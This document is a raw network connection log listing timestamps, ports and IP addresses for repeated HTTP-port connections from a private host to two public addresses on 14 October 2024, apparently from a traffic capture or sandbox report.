Oct 14, 2024 06:03:14.871526003 CEST	80	50006	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:14.871674061 CEST	50006	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:14.871865988 CEST	50006	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:14.874526978 CEST	50007	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:14.876704931 CEST	80	50006	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:14.879425049 CEST	80	50007	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:14.883253098 CEST	50007	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:14.883373976 CEST	50007	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:14.883388996 CEST	50007	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:14.888149023 CEST	80	50007	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:14.888326883 CEST	80	50007	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:16.441132069 CEST	80	50007	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:16.441256046 CEST	80	50007	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:16.441473007 CEST	50007	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:16.441533089 CEST	50007	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:16.444164991 CEST	50008	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:16.446314096 CEST	80	50007	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:16.449058056 CEST	80	50008	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:16.449140072 CEST	50008	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:16.449224949 CEST	50008	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:16.449242115 CEST	50008	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:16.454006910 CEST	80	50008	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:16.454152107 CEST	80	50008	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:18.047068119 CEST	80	50008	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:18.047199011 CEST	80	50008	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:18.047257900 CEST	50008	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:18.051579952 CEST	50008	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:18.054497957 CEST	50009	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:18.056449890 CEST	80	50008	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:18.059350014 CEST	80	50009	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:18.059448957 CEST	50009	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:18.059562922 CEST	50009	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:18.059576035 CEST	50009	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:18.064452887 CEST	80	50009	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:18.064482927 CEST	80	50009	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:19.642184973 CEST	80	50009	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:19.642496109 CEST	80	50009	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:19.642689943 CEST	50009	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:19.642844915 CEST	50009	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:19.645824909 CEST	50010	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:19.649708986 CEST	80	50009	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:19.652997971 CEST	80	50010	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:19.653191090 CEST	50010	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:19.653225899 CEST	50010	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:19.653278112 CEST	50010	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:19.658183098 CEST	80	50010	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:19.658227921 CEST	80	50010	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:21.149692059 CEST	80	50010	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:21.149817944 CEST	80	50010	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:21.149882078 CEST	50010	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:21.150099039 CEST	50010	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:21.152676105 CEST	50011	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:21.154891014 CEST	80	50010	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:21.157593012 CEST	80	50011	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:21.157727003 CEST	50011	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:21.158194065 CEST	50011	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:21.158229113 CEST	50011	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:21.163177013 CEST	80	50011	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:21.163208008 CEST	80	50011	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:22.762264013 CEST	80	50011	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:22.762435913 CEST	80	50011	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:22.762582064 CEST	50011	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:22.762660980 CEST	50011	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:22.767488003 CEST	80	50011	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:22.768412113 CEST	50012	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:22.773644924 CEST	80	50012	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:22.773803949 CEST	50012	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:22.773956060 CEST	50012	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:22.773974895 CEST	50012	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:22.778783083 CEST	80	50012	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:22.778902054 CEST	80	50012	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:24.251450062 CEST	80	50012	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:24.252487898 CEST	80	50012	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:24.252561092 CEST	50012	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:24.252649069 CEST	50012	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:24.257479906 CEST	80	50012	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:24.264885902 CEST	50013	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:24.269844055 CEST	80	50013	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:24.270028114 CEST	50013	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:24.270028114 CEST	50013	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:24.270092964 CEST	50013	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:24.274941921 CEST	80	50013	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:24.274971962 CEST	80	50013	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:25.849334002 CEST	80	50013	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:25.849361897 CEST	80	50013	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:25.849541903 CEST	50013	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:25.850030899 CEST	50013	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:25.853420973 CEST	50014	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:25.854768038 CEST	80	50013	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:25.858289003 CEST	80	50014	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:25.858442068 CEST	50014	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:25.858557940 CEST	50014	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:25.858557940 CEST	50014	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:25.863465071 CEST	80	50014	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:25.863487959 CEST	80	50014	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:27.421068907 CEST	80	50014	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:27.421295881 CEST	80	50014	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:27.421559095 CEST	50014	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:27.421588898 CEST	50014	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:27.425126076 CEST	50015	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:27.426342964 CEST	80	50014	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:27.429918051 CEST	80	50015	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:27.430119038 CEST	50015	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:27.430206060 CEST	50015	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:27.430206060 CEST	50015	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:27.436080933 CEST	80	50015	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:27.437211990 CEST	80	50015	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:29.192805052 CEST	80	50015	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:29.192902088 CEST	80	50015	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:29.192945957 CEST	50015	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:29.193065882 CEST	50015	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:29.197845936 CEST	80	50015	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:29.198802948 CEST	50016	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:29.203674078 CEST	80	50016	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:29.203737974 CEST	50016	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:29.203883886 CEST	50016	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:29.204062939 CEST	50016	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:29.208640099 CEST	80	50016	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:29.208779097 CEST	80	50016	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:30.817409039 CEST	80	50016	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:30.817430973 CEST	80	50016	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:30.817493916 CEST	50016	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:30.817688942 CEST	50016	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:30.820821047 CEST	50017	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:30.822470903 CEST	80	50016	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:30.825829983 CEST	80	50017	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:30.825891972 CEST	50017	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:30.826036930 CEST	50017	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:30.826054096 CEST	50017	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:30.830816984 CEST	80	50017	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:30.830827951 CEST	80	50017	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:32.304296970 CEST	80	50017	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:32.304611921 CEST	80	50017	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:32.304662943 CEST	50017	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:32.304708958 CEST	50017	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:32.307529926 CEST	50018	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:32.309492111 CEST	80	50017	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:32.312325954 CEST	80	50018	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:32.312400103 CEST	50018	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:32.312530994 CEST	50018	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:32.312586069 CEST	50018	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:32.317257881 CEST	80	50018	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:32.318058968 CEST	80	50018	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:34.246735096 CEST	80	50018	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:34.246750116 CEST	80	50018	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:34.246846914 CEST	50018	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:34.262536049 CEST	50018	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:34.268454075 CEST	80	50018	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:34.559097052 CEST	50019	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:34.563999891 CEST	80	50019	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:34.564124107 CEST	50019	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:34.564255953 CEST	50019	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:34.564279079 CEST	50019	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:34.569087029 CEST	80	50019	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:34.569169998 CEST	80	50019	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:36.144678116 CEST	80	50019	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:36.144823074 CEST	80	50019	125.7.253.10	192.168.2.6
Oct 14, 2024 06:03:36.144916058 CEST	50019	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:36.145157099 CEST	50019	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:03:36.151093960 CEST	80	50019	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:43.886802912 CEST	50023	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:43.891743898 CEST	80	50023	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:43.891823053 CEST	50023	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:43.891976118 CEST	50023	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:43.891976118 CEST	50023	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:43.898107052 CEST	80	50023	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:43.899669886 CEST	80	50023	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:45.418653011 CEST	80	50023	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:45.418693066 CEST	80	50023	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:45.418788910 CEST	50023	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:45.419913054 CEST	50023	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:45.424691916 CEST	80	50023	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:49.583843946 CEST	50024	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:49.589390039 CEST	80	50024	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:49.589489937 CEST	50024	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:49.589613914 CEST	50024	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:49.589648962 CEST	50024	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:49.594459057 CEST	80	50024	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:49.594595909 CEST	80	50024	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:51.149257898 CEST	80	50024	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:51.149308920 CEST	80	50024	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:51.149379969 CEST	50024	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:51.149580956 CEST	50024	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:51.154400110 CEST	80	50024	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:56.724909067 CEST	50025	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:56.729919910 CEST	80	50025	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:56.730031967 CEST	50025	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:56.730218887 CEST	50025	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:56.730258942 CEST	50025	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:56.734994888 CEST	80	50025	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:56.735008001 CEST	80	50025	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:58.244179964 CEST	80	50025	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:58.244283915 CEST	80	50025	125.7.253.10	192.168.2.6
Oct 14, 2024 06:04:58.244487047 CEST	50025	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:58.244621992 CEST	50025	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:04:58.249521971 CEST	80	50025	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:02.499749899 CEST	50026	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:02.504981995 CEST	80	50026	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:02.506556034 CEST	50026	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:02.506752014 CEST	50026	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:02.506829977 CEST	50026	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:02.511853933 CEST	80	50026	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:02.511872053 CEST	80	50026	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:04.062722921 CEST	80	50026	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:04.062818050 CEST	80	50026	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:04.062889099 CEST	50026	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:04.086353064 CEST	50026	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:04.091259956 CEST	80	50026	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:08.607712984 CEST	50027	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:08.613080025 CEST	80	50027	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:08.613198996 CEST	50027	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:08.613362074 CEST	50027	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:08.613362074 CEST	50027	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:08.618210077 CEST	80	50027	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:08.618359089 CEST	80	50027	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:10.088608027 CEST	80	50027	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:10.088699102 CEST	80	50027	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:10.088773012 CEST	50027	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:10.088891029 CEST	50027	80	192.168.2.6	125.7.253.10
Oct 14, 2024 06:05:10.093709946 CEST	80	50027	125.7.253.10	192.168.2.6
Oct 14, 2024 06:05:16.541982889 CEST	50028	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:16.546932936 CEST	80	50028	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:16.547058105 CEST	50028	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:16.547518969 CEST	50028	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:16.547554970 CEST	50028	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:16.552606106 CEST	80	50028	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:16.552635908 CEST	80	50028	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:18.034732103 CEST	80	50028	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:18.035060883 CEST	80	50028	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:18.035144091 CEST	50028	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:18.035245895 CEST	50028	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:18.040147066 CEST	80	50028	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:22.422699928 CEST	50030	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:22.427797079 CEST	80	50030	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:22.429400921 CEST	50030	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:22.429583073 CEST	50030	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:22.429619074 CEST	50030	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:22.434434891 CEST	80	50030	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:22.434561014 CEST	80	50030	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:24.004805088 CEST	80	50030	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:24.004853964 CEST	80	50030	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:24.004899979 CEST	50030	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:24.005111933 CEST	50030	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:24.009852886 CEST	80	50030	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:30.240297079 CEST	50031	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:30.248635054 CEST	80	50031	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:30.250374079 CEST	50031	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:30.250528097 CEST	50031	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:30.250555038 CEST	50031	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:30.258167982 CEST	80	50031	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:30.258184910 CEST	80	50031	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:31.785276890 CEST	80	50031	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:31.785337925 CEST	80	50031	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:31.785511971 CEST	50031	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:31.802289009 CEST	50031	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:31.807192087 CEST	80	50031	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:36.015259981 CEST	50032	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:36.020276070 CEST	80	50032	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:36.023456097 CEST	50032	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:36.023633003 CEST	50032	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:36.023652077 CEST	50032	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:36.028383970 CEST	80	50032	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:36.028527975 CEST	80	50032	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:37.619925022 CEST	80	50032	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:37.619946003 CEST	80	50032	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:37.620141983 CEST	50032	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:37.627446890 CEST	50032	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:37.632394075 CEST	80	50032	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:42.118025064 CEST	50033	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:42.123656988 CEST	80	50033	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:42.127213955 CEST	50033	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:42.127414942 CEST	50033	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:42.127444983 CEST	50033	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:42.132190943 CEST	80	50033	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:42.132280111 CEST	80	50033	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:43.752674103 CEST	80	50033	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:43.752775908 CEST	80	50033	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:43.752844095 CEST	50033	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:43.752986908 CEST	50033	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:43.758641005 CEST	80	50033	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:47.910743952 CEST	50034	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:47.915771961 CEST	80	50034	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:47.919455051 CEST	50034	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:47.919637918 CEST	50034	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:47.919661045 CEST	50034	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:47.924388885 CEST	80	50034	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:47.924493074 CEST	80	50034	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:49.450983047 CEST	80	50034	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:49.451270103 CEST	80	50034	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:49.451324940 CEST	50034	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:49.451364040 CEST	50034	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:49.456125021 CEST	80	50034	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:53.113256931 CEST	50035	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:53.118541956 CEST	80	50035	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:53.119483948 CEST	50035	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:53.119637966 CEST	50035	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:53.119656086 CEST	50035	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:53.124546051 CEST	80	50035	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:53.124577045 CEST	80	50035	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:55.638432980 CEST	80	50035	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:55.638457060 CEST	80	50035	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:55.638545990 CEST	50035	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:55.638787031 CEST	50035	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:55.643518925 CEST	80	50035	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:59.054759979 CEST	50036	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:59.059921026 CEST	80	50036	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:59.062072039 CEST	50036	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:59.062105894 CEST	50036	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:59.062125921 CEST	50036	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:05:59.066992998 CEST	80	50036	211.171.233.129	192.168.2.6
Oct 14, 2024 06:05:59.067147970 CEST	80	50036	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:00.592765093 CEST	80	50036	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:00.592866898 CEST	80	50036	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:00.592981100 CEST	50036	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:00.605973959 CEST	50036	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:00.610966921 CEST	80	50036	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:04.577682972 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:04.583138943 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:04.583221912 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:04.583408117 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:04.583408117 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:04.588236094 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:04.588387966 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:06.826704979 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:06.826725960 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:06.826734066 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:06.826754093 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:06.826762915 CEST	80	50037	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:06.826788902 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:06.826857090 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:06.826966047 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:06.826966047 CEST	50037	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:06.831743956 CEST	80	50037	211.171.233.129	192.168.2.6
